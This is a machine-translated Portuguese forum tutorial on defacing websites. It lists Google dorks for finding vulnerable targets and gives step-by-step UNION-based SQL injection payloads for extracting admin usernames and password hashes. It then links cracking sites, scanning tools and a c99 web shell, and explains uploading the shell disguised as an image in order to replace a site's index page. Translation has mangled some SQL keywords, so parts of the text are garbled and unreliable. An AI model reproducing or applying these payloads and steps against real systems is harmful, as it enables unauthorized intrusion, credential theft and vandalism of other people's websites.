SQL Injection
Desfigurar UM SITE EXPLICADO DESDE O INÍCIO
(DOWNLOADS INCLUINDO)
tutorial sql injection
Desfigurar UM SITE EXPLICADO DESDE O INÍCIO
(DOWNLOADS INCLUINDO)
Eu tomei algumas partes do sql injeção de http://www.milw0rm.com/ . Eu escrevi a parte desfigurar. Estou postando isso aqui coz este tut explica tudo passo a passo.mas a maioria dos tuts sql termina quando encontramos o hash de senha. Então newbees dnt sei wat fazer depois disso. Neste tut eu vou explicar como desfigurar um site a partir do zero espero que você encontrar este útil preencher ....
eu não sou um hacker bom, mas eu quero compartilhar meu conhecimento com cada um .. por isso, se houver algum erro pls me perdoe ....
Se você encontrar este útil tut favor postar um comentário ....
1) encontrar o alvo e obter a senha de administrador
Primeiro temos de encontrar o nosso site-alvo para fazer isso você pode usar este "idiotas".
Vou dar alguns idiotas aqui copiar ninguém dela e colá-lo no google e pesquisa.
Código:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=você pode encontrar lotes de dorks aqui .. (usá-los sem as "marcas")
Código:
http://spam.org/download.php?file=3903261). Verifique a existência de vulnerabilidade
Vamos dizer que temos algum site como este
http://www.site.com/news.php?id=5
Agora, para testar se é vulrnable somarmos ao final do url '(citação),
e que seria http://www.site.com/news.php?id=5%27
por isso, se ter um erro parecido
"Você tem um erro em sua sintaxe SQL; verifique o manual que corresponde à sua versão do servidor MySQL para a direita etc ..."
ou algo semelhante
que isto significa é vulrnable para sql injection :)
2). Encontre o número de colunas
Para encontrar o número de colunas que usamos declaração ORDER BY (diz a banco de dados como encomendar o resultado)
assim como usá-lo? Bem apenas incrementar o número até chegarmos um erro.
http://www.site.com/news.php?id=5 ordem de 1 / * <- nenhum erro
http://www.site.com/news.php?id=5 ordem de 2 / * <- nenhum erro
http://www.site.com/news.php?id=5 ordem de 3 / * <- nenhum erro
http://www.site.com/news.php?id=5 ordem de 4 / * <- erro (obtemos mensagem como esta coluna Unknown '4' em 'cláusula de ordem "ou algo parecido)
que significa que o que tem 3 colunas, porque temos um erro de 4.
3). Verifique se há função UNIÃO
Com união podemos selecionar mais dados em uma instrução SQL.
por isso temos
http://www.site.com/news.php?id=5 união todas selecionar 1,2,3 / * (que já descobriram que o número de colunas são 3 na seção 2). )
se vemos alguns números na tela, ou seja, 1 ou 2 ou 3, em seguida, as obras UNIÃO :)
4). Verifique se há versão MySQL
http://www.site.com/news.php?id=5 união todas selecionar 1,2,3 / * NOTA: se / * não está funcionando ou você receber algum erro, então tente -
é um comentário e é importante para a nossa consulta para funcionar corretamente.
vamos dizer que temos o número 2 na tela, agora para verificar a versão
substituímos o número 2 com@@version ou versão () e obter como someting 4.1.33-log ou 5.0.45 ou similar.
ele deve ficar assim http://www.site.com/news.php?id=5 união todas selecionar 1,@@version, 3 / *
se você receber um erro de "união + mix ilegal de agrupamentos (+ coercible implícita) ..."
Eu não vi nenhum papel que cobre este problema, então eu preciso escrevê-lo :)
o que precisamos é função de conversão ()
ou seja,
http://www.site.com/news.php?id=5 união todas selecionar 1, converter (versão@@usando latin1), 3 / *
ou hexagonal com () e unhex ()
ou seja,
http://www.site.com/news.php?id=5 união todas selecionar 1, unhex (hex (@@version)), 3 / *
e você vai ter versão do MySQL: D
5). Conseguir mesa e coluna nome
bem, se a versão do MySQL é <5 (ou seja, 4.1.33, 4.1.12 ...) <--- depois vou descrever para o MySQL> 5 versão.
devemos supor tabela eo nome da coluna, na maioria dos casos.
nomes de tabelas comuns são: user / s, admin / s, membro / s ...
nomes das colunas comuns são: nome de usuário, usuário, usr, user_name, password, passar, passwd, pwd etc ...
ou seja, seria
http://www.site.com/news.php?id=5 união todas selecionar 1,2,3 de admin / * (vemos o número 2 na tela como antes, e isso é bom: D)
sabemos que a tabela de administração existe ...
agora para verificar os nomes das colunas.
http://www.site.com/news.php?id=5 união todas selecionar 1, username, 3 de admin / * (se você receber um erro, então tente o outro nome da coluna)
obtemos nome de usuário exibido na tela, exemplo seria admin, ou superadmin etc ...
agora para verificar se a senha coluna existe
http://www.site.com/news.php?id=5 união todas selecionar 1, senha, 3 de admin / * (se você receber um erro, então tente o outro nome da coluna)
vimos senha na tela de hash ou de texto simples, que depende de como o banco de dados está configurado :)
ou seja, hash MD5, mistura mysql, sha1 ...
agora temos que completar consulta para procurar nice :)
para que possamos utilizar concat () função (se junta cordas)
ou seja,
http://www.site.com/news.php?id=5 união todas selecionar 1, concat (username, 0x3a, password), 3 de admin / *
Note que eu coloquei 0x3a, o seu valor hexadecimal para: (assim 0x3a é o valor hexadecimal de dois pontos)
(Não há outro caminho para que, char (58), o valor ascii para:)
http://www.site.com/news.php?id=5 união todas selecionar 1, concat (username, char (58), password), 3 de admin / *
agora temos nome de usuário dislayed: senha na tela, ou seja, administrador: admin ou admin: somehash
quando você tem isso, você pode fazer login como administrador ou algum superusuário: D
se não pode adivinhar o nome da tabela à direita, você pode sempre tentar mysql.user (default)
ele tem usuário i colunas de senha, de modo exemplo seria
http://www.site.com/news.php?id=5 união todas selecionar 1, concat (usuário, 0x3a, password), 3 de mysql.user / *
6). MySQL 5
Como eu disse antes eu vou explicar como obter os nomes de tabelas e colunas
em MySQL> 5.
Para isso, precisamos information_schema. Ele mantém todas as tabelas e colunas no banco de dados.
para obter as tabelas que usamos nome_tabela e information_schema.tables.
ou seja,
http://www.site.com/news.php?id=5 união todas selecionar 1, table_name, 3 de information_schema.tables / *
aqui vamos substituir o nosso número 2 com nome_tabela para obter a primeira tabela de information_schema.tables
exibida na tela. Agora devemos adicionar limite para o fim da consulta para listar todas as tabelas.
ou seja,
http://www.site.com/news.php?id=5 união todas selecionar 1, table_name, 3 de information_schema.tables 0,1 / *
note que eu coloquei 0,1 (obter um resultado a partir do 0)
agora para ver a segunda tabela, mudamos limite de 0,1 para limitar 1,1
ou seja,
http://www.site.com/news.php?id=5 união todas selecionar 1, table_name, 3 de information_schema.tables 1,1 / *
a segunda tabela é exibida.
para terceira tabela que colocamos limitar 2,1
ou seja,
http://www.site.com/news.php?id=5 união todas selecionar 1, table_name, 3 de information_schema.tables 2,1 / *
manter incrementando até chegar alguns útil como db_admin, poll_user, auth, AUTH_USER etc ...: D
Para obter os nomes das colunas, o método é o mesmo.
aqui usamos column_name e INFORMATION_SCHEMA.COLUMNS
o método é o mesmo que acima exemplo seria assim
http://www.site.com/news.php?id=5 união todas selecionar 1, column_name, 3 de INFORMATION_SCHEMA.COLUMNS 0,1 / *
a primeira coluna é diplayed.
o segundo (mudamos limite de 0,1 para limitar 1,1)
isto é.
http://www.site.com/news.php?id=5 união todas selecionar 1, column_name, 3 de INFORMATION_SCHEMA.COLUMNS limitar 1,1 / *
a segunda coluna é apresentado, de modo a manter incrementando até chegar algo como
nome de usuário, usuário, login, senha, passar, passwd etc ...: D
se vocês os nomes das colunas de exibição wanna tabela específica para utilizar esta consulta. (Cláusula WHERE)
vamos dizer que encontramos os usuários da tabela.
ou seja,
http://www.site.com/news.php?id=5 união todas selecionar 1, column_name, 3 de INFORMATION_SCHEMA.COLUMNS onde table_name = 'users' / *
Agora temos mostrado nome da coluna na tabela usuários. Basta usar LIMIT podemos listar todas as colunas na tabela de usuários.
Note que isto não irá funcionar se os magic quotes é ON.
vamos dizer que encontramos colums usuário, passar e-mail.
Agora para completar consulta para colocá-los todos juntos: D
para que nós usamos concat (), i descrevê-lo mais cedo.
ou seja,
http://www.site.com/news.php?id=5 união todas selecionar 1, concat (usuário, 0x3a, passar, 0x3a, e-mail) de usuários / *
o que temos aqui é user: pass: e-mail de usuários da tabela.
exemplo: admin: hash de: whatever@blabla.com
** Se você é preguiçoso demais para fazer acima coisas que você pode usar as ferramentas que eles vão fazer todo o trabalho:
1) Exploit scanner (isso irá encontrar sites vulneráveis)
Código:
http://spam.org/download.php?file=390338Código:
http://rapidshare.com/files/248029073/SQLIHelperV.2.7.rarem alguns sites que você pode ver diretamente a senha. mas a maioria dos sites de criptografá-los usando MD5. so u hav para quebrar o hash para obter a senha.para quebrar a senha, existem três maneiras
1) verificar o líquido se este hash é rachado antes:
Código:
http://www.md5decrypter.co.ukCódigo:
http://www.milw0rm.com/cracker/insert.php
http://passcracking.com/index.phpCódigo:
http://rapidshare.com/files/136967969/a_MD5CF_2.10_2b.rar
Password = OwlsNest2) desfigurar DO SITE
depois de obter a senha que você pode fazer login como administrador do site. Mas primeiro você tem que encontrar a página de login de administrador para o site. há r três métodos para encontrar o painel de administração.
1) você pode usar um site de administração localizador:
Código:
http://4dm1n.houbysoft.com/Código:
http://spam.org/download.php?file=390339após o login como o administrador pode fazer upload de fotos para o site. então agora você está indo para carregar um shell para o site usando essa facilidade de upload.
dowload o shell aqui (conchas são scripts PHP que afeta sites por isso será detectado como trojans, mas não precisa se preocupar eu assumir a responsabilidade):
Código:
http://spam.org/download.php?file=390328alguns sites não vai permitir que você faça o upload de um arquivo php. então renomeá-lo como c99.php.gif
em seguida, carregá-lo.
depois que vão para http://www.site.com/images (na maioria dos sites de imagens são guardadas nesta dir mas se você não puder encontrar c99 lá, então você tem que adivinhar a dir)
encontrar o c99.php.gif e clique nele ..
Agora você pode ver um painel grande controle ....
Agora você pode fazer o que quiser fazer ...
procurar o arquivo index.html e substituí-lo por seu próprio arquivo. por isso, se qualquer um vai para o site que eles vão ver sua página ....